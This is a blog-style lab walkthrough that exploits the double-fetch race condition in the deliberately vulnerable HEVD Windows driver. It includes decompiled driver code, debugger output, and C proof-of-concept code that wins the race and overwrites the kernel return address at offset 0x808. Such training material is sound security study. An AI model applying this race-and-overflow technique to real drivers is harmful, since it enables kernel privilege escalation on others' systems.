HEVD Double-fetch Walkthrough on Windows 2022

Introduction

At the time of writing I am studying towards attempting the OffSec OSEE exam, and will probably take it more than once! I realised I know very little about race conditions and so decided to take on the double-fetch vulnerability in the HackSys Extreme Vulnerable Driver (HEVD).

A double fetch is a type of race condition vulnerability. It occurs when a program, typically in the kernel, fetches data from user space more than once without ensuring that the data has not changed between the fetches. An attacker can alter the data in the window between the two fetches, for example after it has been validated but before it is used, which makes this a form of time-of-check-to-time-of-use (TOCTOU) vulnerability.

I have briefly written about kernel debugging before, so will not do so here.

Gathering Information

Let’s start by finding the symlink and the dispatch routines. We will use the symlink to communicate with the driver from user mode, and the IOCTL will direct our buffer to the correct dispatch routine; from there we can look for the bug.

Using WinDbg, whilst debugging the remote kernel we find the IRP_MJ_DEVICE_CONTROL dispatch function:

1: kd> .reload
Connected to Windows 10 20348 x64 target at (Sun Sep 29 17:57:35.528 2024 (UTC + 1:00)), ptr64 TRUE
Loading Kernel Symbols
...
1: kd> lm
Browse full module list
start             end                 module name
...
fffff800`15f30000 fffff800`15fbc000   HEVD       (deferred)             
1: kd> !drvobj \Driver\HEVD 2
Driver object (ffff828630c6be30) is for:
Unable to load image \??\C:\Users\Administrator\Desktop\HEVD\HEVD.sys, Win32 error 0n2
 \Driver\hevd

...
[0e] IRP_MJ_DEVICE_CONTROL              fffff80015fb5078	HEVD+0x85078
...

To find the symlink we can use IDA and start by looking in the DriverEntry function (I renamed the call to HEVDDriverSetup):

000000000008A134 public DriverEntry
000000000008A134 DriverEntry proc near
000000000008A134
000000000008A134 arg_0= qword ptr  8
000000000008A134
000000000008A134 mov     [rsp+arg_0], rbx
000000000008A139 push    rdi
000000000008A13A sub     rsp, 20h
000000000008A13E mov     rbx, rdx
000000000008A141 mov     rdi, rcx
000000000008A144 call    __security_init_cookie
000000000008A149 mov     rdx, rbx
000000000008A14C mov     rcx, rdi
000000000008A14F call    HEVDDriverSetup
000000000008A154 mov     rbx, [rsp+28h+arg_0]
000000000008A159 add     rsp, 20h
000000000008A15D pop     rdi
000000000008A15E retn
000000000008A15E DriverEntry endp

Following this call takes us to the next code block:

000000000008A000 mov     [rsp-8+arg_0], rbx
000000000008A005 mov     [rsp-8+arg_8], rdi
000000000008A00A push    rbp
000000000008A00B mov     rbp, rsp
000000000008A00E sub     rsp, 60h
000000000008A012 and     [rbp+arg_10], 0
000000000008A017 lea     rdx, aDeviceHacksyse ; "\\Device\\HackSysExtremeVulnerableDriver"
...

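Strictly speaking this is the device name, but it looks suspiciously like the symlink too, and the PoC later confirms that \\.\HackSysExtremeVulnerableDriver opens the device from user mode.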

IOCTL

Now I needed to find the I/O control code for the double-fetch bug. This isn’t going to be simple in a real-world scenario, but I’m here to learn how to exploit a double-fetch bug, not reverse engineer the driver binary.

I decompiled the assembly in IDA and found this:

case 0x222037:
  DbgPrintEx(0x4Du, 3u, "****** HEVD_IOCTL_DOUBLE_FETCH ******\n");
  v6 = DoubleFetchFunction(a2, v2);
  v7 = "****** HEVD_IOCTL_DOUBLE_FETCH ******\n";

I renamed the function whose return value is stored in v6; IDA had named it sub_86800 (which conveniently means the subroutine at an offset of 0x86800 from the base address of the module).

Following a few calls that the HEVD code uses to set up each bug I land here:

__int64 __fastcall sub_8681C(const void **a1)
{
  unsigned __int64 v2; // r9
  char v4[2048]; // [rsp+20h] [rbp-808h] BYREF

  sub_1500(v4, 0LL, 2048LL);
  ProbeForRead(a1, 16LL, 1LL);
  DbgPrintEx(0x4Du, 3u, "[+] UserDoubleFetch: 0x%p\n", a1);
  DbgPrintEx(0x4Du, 3u, "[+] KernelBuffer: 0x%p\n", v4);
  DbgPrintEx(0x4Du, 3u, "[+] KernelBuffer Size: 0x%X\n", 2048LL);
  DbgPrintEx(0x4Du, 3u, "[+] UserDoubleFetch->Buffer: 0x%p\n", *a1);
  DbgPrintEx(0x4Du, 3u, "[+] UserDoubleFetch->Size: 0x%X\n", a1[1]);
  v2 = (unsigned __int64)a1[1];
  if ( v2 <= 0x800 )
  {
    DbgPrintEx(0x4Du, 3u, "[+] Triggering Double Fetch\n");
    RtlCopyMemory(v4, *a1, a1[1]);
    return 0LL;
  }
  else
  {
    DbgPrintEx(0x4Du, 3u, "[-] Invalid Buffer Size: 0x%X\n", v2);
    return 3221225485LL;
  }
}

Reversing and Tidying Up

Microsoft documentation states that “the ProbeForRead routine checks that a user-mode buffer actually resides in the user portion of the address space, and is correctly aligned”. At this point I’m not getting overly concerned with this!

I reversed the function that immediately precedes the call to sub_8681C, using the Vergilius Project for the structure layouts, to understand the variables being sent to the vulnerable function:

__int64 __fastcall DoubleFetchFunction(__int64 Irp, __int64 CurrentStackLocation)
{
  const void **Type3InputBuffer; // rcx
  __int64 result; // rax

  Type3InputBuffer = *(const void ***)(CurrentStackLocation + 0x20);
  result = 0xC0000001LL;
  if ( Type3InputBuffer )
    return sub_8681C(Type3InputBuffer);
  return result;
}

From this we can ascertain that a buffer that we control is being sent. Removing all of the debug statements, we are left with:

__int64 __fastcall sub_8681C(const void **InputBuffer)
{
  const void *SizeOfBuffer; // r9

  // creating a kernel buffer on the stack (not sure why the type is __m128i)
  // eagle eyes will notice from rbp-808h that copying more than 0x808 bytes will overwrite the return address
  __m128i KernelBuffer[128]; // [rsp+20h] [rbp-808h] BYREF

  // not 100% but this looks like a call to memset (zeroing out 0x800 bytes)?
  maybe_memset((__m128 *)KernelBuffer, 0, 0x800uLL);

  // this checks that our input buffer is mapped to user mode
  ProbeForRead(InputBuffer, 16LL, 1LL);

  // the size we provide is taken and checked to ensure it is <= 0x800
  SizeOfBuffer = InputBuffer[1];
  if ( (unsigned __int64)SizeOfBuffer <= 0x800 )
  {
    // here is the bug, instead of using SizeOfBuffer to make the copy
    // InputBuffer[1] is being fetched again (this is the double fetch)
    RtlCopyMemory(KernelBuffer, (unsigned __int64)*InputBuffer, (unsigned __int64)InputBuffer[1]);
    return 0LL;
  }
  else
  {
    return 0xC000000DLL;
  }
}

It looks like we can try to win a race between the if statement and the RtlCopyMemory statement.

The plan is to create a user space buffer of, say, 0xc00 bytes, send a pointer to it in InputBuffer[0] with a size of 0x800 in InputBuffer[1], then somehow change the size in the struct to 0xc00 after the check but before the copy. We will set up a basic PoC with what we know first. In the later version, the SendIOCTL thread is the one that triggers the kernel dispatch routine.

Proof of Concept

Let’s start with a proof of concept with which to test connectivity:

#include <stdio.h>
#include <Windows.h>

struct UserData {
    LPVOID pBuffer;
    size_t sizeOfData;
};

int main() {
    printf("HEVD Double Fetch Exploit\n=========================\n");

    // get a handle to the driver
    HANDLE hDriver = CreateFileW(L"\\\\.\\HacksysExtremeVulnerableDriver",
        GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);

    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("[!] Unable to get a handle for the driver: %lu\n", GetLastError());
        return 1;
    }

    // allocate the user space buffer
    // (0xc00 bytes; sizeof(char*) here would over-allocate by a factor of 8)
    char* userBuffer = (char*)malloc(0xc00);
    memset(userBuffer, 0x41, 0xc00);

    // struct to send to the driver
    UserData userData;
    userData.pBuffer = userBuffer;
    userData.sizeOfData = 0x800;

    // send our data
    BOOL status = DeviceIoControl(hDriver, 0x222037, (LPVOID)&userData, sizeof(userData), NULL, 0, NULL, NULL);

    // output the status
    printf("[+] status, when buffer size is 0x800: %d\n", status);

    // send our data, with larger buffer size
    userData.sizeOfData = 0x1500;
    status = DeviceIoControl(hDriver, 0x222037, (LPVOID)&userData, sizeof(userData), NULL, 0, NULL, NULL);

    // output the status
    printf("[+] status, when buffer size is 0x1500:%d\n", status);
}

Here we test the driver by creating a user space buffer and filling 0xc00 bytes of it with 0x41. First we send the struct that points to our data with a sizeOfData field value of 0x800, and then we send the same struct with a sizeOfData field value of 0x1500, which should fail the size check:

HEVD Double Fetch Exploit
=========================
[+] status, when buffer size is 0x800: 1
[+] status, when buffer size is 0x1500:0

Looking at the assembly for the function, we see that rcx is moved into rdi at offset 0x86838; rcx should hold a pointer to our struct at the start of the function.

000000000008681C mov     rax, rsp
000000000008681F mov     [rax+8], rbx
0000000000086823 mov     [rax+10h], rsi
0000000000086827 mov     [rax+18h], rdi
000000000008682B mov     [rax+20h], r14
000000000008682F push    r15
0000000000086831 sub     rsp, 820h
0000000000086838 mov     rdi, rcx

Let’s put a breakpoint at offset HEVD+0x8681c and run the code again:

1: kd> g
Breakpoint 0 hit
HEVD+0x8681c:
fffff801`296d681c 488bc4          mov     rax,rsp
1: kd> dq poi(rcx)
0000012e`673aeff0  41414141`41414141 41414141`41414141
0000012e`673af000  41414141`41414141 41414141`41414141
0000012e`673af010  41414141`41414141 41414141`41414141
0000012e`673af020  41414141`41414141 41414141`41414141
0000012e`673af030  41414141`41414141 41414141`41414141
0000012e`673af040  41414141`41414141 41414141`41414141
0000012e`673af050  41414141`41414141 41414141`41414141
0000012e`673af060  41414141`41414141 41414141`41414141

This output shows that the struct passed in to the kernel points at our buffer. We can also show the value of the sizeOfData field:

1: kd> dd rcx+8 L1
00007ff7`4d094628  00000800

Perfect! Now we know that the PoC is working we can move on to the tricky next phase, which is triggering the bug by winning a race!

Winning the Race

I decided to create two threads, one for sending the normal IOCTL that should pass the buffer length check, and a second thread to try and change the buffer size before the copy operation; this is the race condition I am trying to win. To do this I set the structure-changing thread to run a loop 100 times:

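// this is the function trying to win the race
DWORD WINAPI ChangeStruct(void* args)
{
    // write through a volatile pointer so an optimising compiler
    // cannot collapse the 100 stores into a single one
    volatile size_t* size = &userData.sizeOfData;
    for (int i = 0; i < 100; i++)
    {
        *size = 0xc00;
    }
    return 0;
}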

// this is the function sending the IOCTL
DWORD WINAPI SendIOCTL(void* args)
{
    userData.pBuffer = userBuffer;
    userData.sizeOfData = 0x800;
    BOOL status = DeviceIoControl(hDriver,
        0x222037, (LPVOID)&userData, sizeof(userData), NULL, 0, NULL, NULL);

    return 0;
}

My logic was that if there was a single thread writing to the structure 100 times, then hopefully one of those writes would land between the driver’s size check and its copy, and I would win the race. To make things nice and simple I used global variables, rather than passing pointers between threads (which I will probably tidy up for the final exploit):

// global variables
UserData userData;
char* userBuffer;
HANDLE hDriver;

I did a little bit of research around race conditions and read some different texts about changing thread priority and setting the processor affinity for each thread. I did this, but was curious to see if the race could be won without it, and it turns out it can. Here are the main snippets of my code:

int main() {
    // omitted for brevity ...
    while(TRUE)
    {
        HANDLE handles[2] = { 0 };

        // send the initial IOCTL
        HANDLE tIOCTL = CreateThread(NULL,
            0, SendIOCTL, NULL, CREATE_SUSPENDED, NULL);

        // try to win the race
        HANDLE tChangeStruct = CreateThread(NULL,
            0, ChangeStruct, NULL, CREATE_SUSPENDED, NULL);

        handles[0] = tIOCTL;
        handles[1] = tChangeStruct;

        ResumeThread(tChangeStruct);
        ResumeThread(tIOCTL);

        // wait for both threads, then release their handles so the
        // endless loop does not leak two handles per iteration
        WaitForMultipleObjects(2, handles, TRUE, INFINITE);
        CloseHandle(tIOCTL);
        CloseHandle(tChangeStruct);
    }
}

Notice that my loop will run forever. This isn’t going to be a good strategy when it comes to escalating privileges, because I will need some way to detect that the race has been won, but I decided to think about that later. My focus for now was to win the race and overwrite the return address on the kernel stack.

I ran the code on the target whilst my kernel debugger was attached, and after a few minutes I got a crash:

1: kd> g
Access violation - code c0000005 (!!! second chance !!!)
HEVD+0x86952:
fffff800`15fb6952 c3              ret
0: kd> k L5
 # Child-SP          RetAddr               Call Site
00 fffff68f`df25a788 41414141`41414141     HEVD+0x86952
01 fffff68f`df25a790 41414141`41414141     0x41414141`41414141
02 fffff68f`df25a798 41414141`41414141     0x41414141`41414141
03 fffff68f`df25a7a0 41414141`41414141     0x41414141`41414141
04 fffff68f`df25a7a8 41414141`41414141     0x41414141`41414141

Boom! I had triggered the bug and forced a buffer overflow on the stack. My next goal was to control rip with a ROP gadget.

Controlling RIP

I ran the PoC again but this time copied an msf-pattern_create buffer into the user mode buffer:

char pattern[] = "Aa0Aa1Aa2Aa3Aa4Aa5..."; // truncated for display; the real string is the full 0xc00-byte pattern
memcpy_s(userBuffer, 0xc00, pattern, 0xc00);

I walked the dog, waiting for the race condition to trigger the bug… race conditions can take time…

When the bug triggered I got a rather unhelpful bugcheck in Windows:

*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

UNEXPECTED_KERNEL_MODE_TRAP (7f)

So I examined the call stack anyway:

kd> k
 # Child-SP          RetAddr               Call Site
ffffcd00`e325e508 fffff800`10f549d2     nt!DbgBreakPointWithStatus
...
fffff68f`ded9c788 37714336`71433571     0xfffff800`15fb6952
fffff68f`ded9c790 72433971`43387143     0x37714336`71433571
fffff68f`ded9c798 43327243`31724330     0x72433971`43387143
fffff68f`ded9c7a0 35724334`72433372     0x43327243`31724330

Way down the stack I found something that looked like my pattern, so I checked out the value at position 23:

msf-pattern_offset -l 0xc00 -q 3771433671433571  
[*] Exact match at offset 2056

I changed the PoC to see if I could overwrite the return address on the stack with 0x4242424242424242. If this was successful then I had found the offset of the return address:

userBuffer = (char*)malloc(0xc00);
memset((void*)userBuffer, 0x41, 0xc00);
memset((void*)(userBuffer + 2056), 0x42, 0x8);

Another cup of coffee… race conditions can take time…

kd> g
Access violation - code c0000005 (!!! second chance !!!)
fffff800`15fb6952 c3              ret
kd> k L5
 # Child-SP          RetAddr               Call Site
fffff68f`ded8e788 42424242`42424242     0xfffff800`15fb6952
fffff68f`ded8e790 41414141`41414141     0x42424242`42424242
fffff68f`ded8e798 41414141`41414141     0x41414141`41414141
fffff68f`ded8e7a0 41414141`41414141     0x41414141`41414141
fffff68f`ded8e7a8 41414141`41414141     0x41414141`41414141

There we have it, control of the return address at a buffer offset of 0x808, 8 bytes past the end of the intended 0x800-byte buffer. In Part 2 I will attempt to get privilege escalation and restore the thread gracefully.
